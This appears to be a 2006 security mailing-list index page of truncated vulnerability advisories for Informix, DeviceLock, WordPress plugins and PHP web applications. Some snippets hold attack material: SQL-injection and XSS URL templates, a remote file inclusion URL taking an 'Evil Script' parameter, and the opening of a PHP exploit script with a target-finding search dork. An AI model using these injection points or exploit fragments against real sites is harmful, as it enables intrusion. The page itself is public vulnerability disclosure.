|
|
Colapse all |
Post message
Re: Re: TSRT-06-02: Microsoft SRV.SYS Mailslot Ring0 Memory Corruption Vulnerability 2006-08-14 mr simla colostate edu Multiple Password Exposures Flaws 2006-08-14 NGSSoftware Insight Security Research (nisr nextgenss com) NGSSoftware Insight Security Research Advisory Name: Multiple Password Exposures Flaws Systems Affected: All versions of Informix Severity: High Vendor URL: http://www.ibm.com/ Author: David Litchfield [ davidl (at) ngssoftware (dot) com [email concealed] ] Date of Public Advisory: 2nd August 2006 Advisory number: #NISR0208200 [ more ] [ reply ] Local privilege Escalation in SmartLine DeviceLock 5.73 2006-08-13 seppi seppig de The vulnerability constitutes of wrong ACLs on Device Object permission set by the driver. Whenever your ACLs on a harddrive or partition, as configured by DeviceLock Manager, only consists of Allow entries (and Deny being the default), then the driver sets the ACLs on the kernel's internal objec [ more ] [ reply ] Unauthorized Database Creation Privilege on Informix 2006-08-14 NGSSoftware Insight Security Research (nisr nextgenss com) NGSSoftware Insight Security Research Advisory Name: Unauthorized Database Creation Privilege on Informix Systems Affected: 9.40.xC6 and earlier and 10.00.xC2, C1 Severity: High Vendor URL: http://www.ibm.com/ Author: David Litchfield [ davidl (at) ngssoftware (dot) com [email concealed] ] Date of Public Advisory: 2nd August 2 [ more ] [ reply ] Technical note: under some conditions, it's possible to steal HTTP credentials using Flash 2006-08-14 Amit Klein (AKsecurity) (aksecurity hotpop com) Technical note: under some conditions, it's possible to steal HTTP credentials using Flash (requires IE + some transparent proxies or virtual hosting) The method described here is pretty simple. It works though only on HTTP (not HTTPS) credentials. Also, it works only when the client browses (usi [ more ] [ reply ] InfanView 3.98 (with plugins) - Access violation at processing images CUR files 2006-08-12 sehato yandex ru Multiple Arbitrary Command Execution Vulnerabilities 2006-08-14 NGSSoftware Insight Security Research (nisr nextgenss com) NGSSoftware Insight Security Research Advisory Name: Multiple Arbitrary Command Execution Vulnerabilities Systems Affected: All versions of Informix Severity: High Vendor URL: http://www.ibm.com/ Author: David Litchfield [ davidl (at) ngssoftware (dot) com [email concealed] ] Date of Public Advisory: 2nd August 2006 Advisory n [ more ] [ reply ] Arbitrary Library Loading in Informix 2006-08-14 NGSSoftware Insight Security Research (nisr nextgenss com) NGSSoftware Insight Security Research Advisory Name: Arbitrary Library Loading in Informix Systems Affected: All versions of Informix Severity: High Vendor URL: http://www.ibm.com/ Author: David Litchfield [ davidl (at) ngssoftware (dot) com [email concealed] ] Date of Public Advisory: 2nd August 2006 Advisory number: #NISR020 [ more ] [ reply ] Wordpress WP-DB Backup Plugin Directory Traversal Vulnerability 2006-08-14 ss_team (ssteam pl gmail com) Hi all, Software: WP-DB Backup Plugin for Wordpress Homepage: http://www.skippy.net/blog/category/wordpress/plugins/wp-db-backup/ Description: WP-DB Backup is vulnerable to directory traversal attack. You must have administrator rights in the wordpress blog to exploit this vulnerability. PoC: ht [ more ] [ reply ] HPSBMA02138 SSRT061184 rev.1 - HP OpenView Storage Data Protector, Remote Arbitrary Command Execution 2006-08-14 security-alert hp com -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c00742778 Version: 1 HPSBMA02138 SSRT061184 rev.1 - HP OpenView Storage Data Protector, Remote Arbitrary Command Execution NOTICE: The information in this Security Bulletin should be acted upon [ more ] [ reply ] JavaScript get Internal Address (thanks to DanBUK) 2006-08-12 pdp (architect) (pdp gnucitizen googlemail com) http://www.gnucitizen.org/projects/javascript-address-info http://f-box.org/~dan/jstest.html The following technique was brought to me by DanBUK (http://f-box.org/~dan/). Dan managed to find the internal IP address of the visiting client by establishing a socket between local host and the remote we [ more ] [ reply ] Virtual War v1.5.0 SQL injection and XSS 2006-08-14 vampire_chiristof yahoo com Virtual War v1.5.0 SQL injection and XSS http://[host]/vwar/war.php?s=[SQL] http://[host]/vwar/war.php?page=[SQL]or[xss] http://[host]/vwar/war.php?showgame=[SQL] http://[host]/vwar/war.php?sortby=[sql] http://[host]/vwar/war.php?sortorder=[sql] http://host]/vwar/calendar.php?year=[xss] v [ more ] [ reply ] XMB <= 1.9.6 Final basename()/'langfilenew' arbitrary local inclusion / remote commands execution 2006-08-13 rgod autistici org #!/usr/bin/php -q -d short_open_tag=on <? echo "XMB <= 1.9.6 Final basename() 'langfilenew' arbitrary local inclusion / remote commands xctn\n"; echo "by rgod rgod (at) autistici (dot) org [email concealed]\n"; echo "site: http://retrogod.altervista.org\n"; echo "dork: \"Powered by XMB\"\n\n"; /* works regardless of ph [ more ] [ reply ] SQLIDEBUG envariable overflow on Informix 2006-08-14 NGSSoftware Insight Security Research (nisr nextgenss com) NGSSoftware Insight Security Research Advisory Name: SQLIDEBUG envariable overflow on Informix Systems Affected: 9.40.xC6 and earlier and 10.00.xC2, C1 Severity: High Vendor URL: http://www.ibm.com/ Author: David Litchfield [ davidl (at) ngssoftware (dot) com [email concealed] ] Date of Public Advisory: 2nd August 2006 Advisor [ more ] [ reply ] Google Picasa Listening on Port 80? 2006-08-11 Geoff Vass (geoff cadzow com au) I'm using Picasa 2.5 Beta (32.43), and I notice from Sysinternals' TCPVIEW app that it is listening on port 80. So I fire up the browser, and sure enough, http://localhost returns a blank page. When I close Picasa, the browser returns "The page cannot be displayed". What a great idea, a user-mode g [ more ] [ reply ] [ECHO_ADV_45$2006] WEBinsta CMS 0.3.1 (templates_dir) Remote File Inclusion Vulnerability 2006-08-14 erdc echo or id ECHO_ADV_45$2006 ------------------------------------------------------------------------ ----------------- [ECHO_ADV_45$2006] WEBinsta CMS 0.3.1 (templates_dir) Remote File Inclusion Vulnerability ------------------------------------------------------------------------ ----------------- Autho [ more ] [ reply ] Re: Mafia Moblog <= 6 (pathtotemplate) Remote File Inclusion Vulnerability 2006-08-11 noname nodomain com (please remove this bid : 19458) Mafia Moblog isn't vulnerable. why ?! Exploit of Mafia is here : http://www.example.com/[Mafia Moblog]/big.php?pathtotemplate=[Evil Script] in big.php we have : <?php include("info.php"); include("template.php"); if (file_exists("$pathtotemplate/includes.php [ more ] [ reply ] Error logging buffer overflow in Informix 2006-08-14 NGSSoftware Insight Security Research (nisr nextgenss com) NGSSoftware Insight Security Research Advisory Name: Error logging buffer overflow in Informix Systems Affected: Informix 9.40.xC7 and xC8, 10.00.xC3 and xC4 Severity: Critical Vendor URL: http://www.ibm.com/ Author: David Litchfield [ davidl (at) ngssoftware (dot) com [email concealed] ] Date of Public Advisory: 2nd August 20 [ more ] [ reply ] |
|
Privacy Statement |
The bug as reported in thread 19034 is fixed in the version osDate 1.1.8.
Thanks
Vijay
[ more ] [ reply ]